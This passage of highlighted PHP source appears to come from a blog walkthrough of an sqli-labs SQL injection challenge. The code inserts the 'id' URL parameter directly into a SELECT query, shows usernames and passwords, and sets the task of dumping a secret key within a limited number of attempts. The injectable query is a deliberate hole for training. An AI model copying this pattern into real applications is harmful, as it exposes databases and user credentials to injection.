class="number">60</span>*<span class="number">60</span>*<span class="number">24</span>*<span class="number">30</span>;</span><br><span class="line"> <span class="variable">$hash</span> = <span class="title function_ invoke__">data</span>(<span class="variable">$table</span>,<span class="variable">$col</span>);</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">"challenge"</span>, <span class="variable">$hash</span>, <span class="variable">$expire</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>\n"</span>;</span><br><span class="line"> /take the variables</span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'id'</span>])){</span><br><span class="line"> <span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">'id'</span>];</span><br><span class="line"> /logging the connection parameters to a file <span class="keyword">for</span> analysis.</span><br><span class="line"> <span class="variable">$fp</span>=<span class="title function_ invoke__">fopen</span>(<span class="string">'result.txt'</span>,<span class="string">'a'</span>);</span><br><span class="line"> <span class="title function_ invoke__">fwrite</span>(<span class="variable">$fp</span>,<span class="string">'ID:'</span>.<span class="variable">$id</span>.<span class="string">"\n"</span>);</span><br><span class="line"> <span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"> /update the counter in database</span><br><span class="line"> <span class="title function_ invoke__">next_tryy</span>();</span><br><span class="line"> /Display attempts on screen.</span><br><span class="line"> <span class="variable">$tryyy</span> = <span class="title function_ invoke__">view_attempts</span>();</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"You have made : "</span>. <span class="variable">$tryyy</span> .<span class="string">" of <span class="subst">$times</span> attempts"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br><br><br>\n"</span>;</span><br><span class="line"> /Reset the Database <span class="keyword">if</span> you exceed allowed attempts.</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$tryyy</span> >= (<span class="variable">$times</span>+<span class="number">1</span>)){</span><br><span class="line"> <span class="title function_ invoke__">setcookie</span>(<span class="string">'challenge'</span>, <span class="string">' '</span>, <span class="title function_ invoke__">time</span>() - <span class="number">3600000</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Redirecting you to challenge page..........\n"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>( <span class="string">"refresh:3;url=../sql-connections/setup-db-challenge.php?id=<span class="subst">$pag</span>"</span> );</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>\n"</span>;</span><br><span class="line"> }</span><br><span class="line"> / Querry DB to get the correct output</span><br><span class="line"> <span class="variable">$sql</span>=<span class="string">"SELECT * FROM security.users WHERE id='<span class="subst">$id</span>' LIMIT 0,1"</span>;</span><br><span class="line"> <span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"> <span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$row</span>){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font color= "#00FFFF">'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Your Login name:'</span>. <span class="variable">$row</span>[<span class="string">'username'</span>];</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Your Password:'</span> .<span class="variable">$row</span>[<span class="string">'password'</span>];</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</font>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font color= "#FFFF00">'</span>;</span><br><span class="line"><span class="comment">// print_r(mysql_error());</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</font>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Please input the ID as parameter with numeric value as done in Lab excercises\n<br><br>\n</font>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<font color='#00FFFF': size=3>The objective of this challenge is to dump the <b>(secret key)</b> from only random table from Database <b><i>('CHALLENGES')</i></b> in Less than <span class="subst">$times</span> attempts<br>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.<br>"</span> ;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><code>答案提交部分</code></p>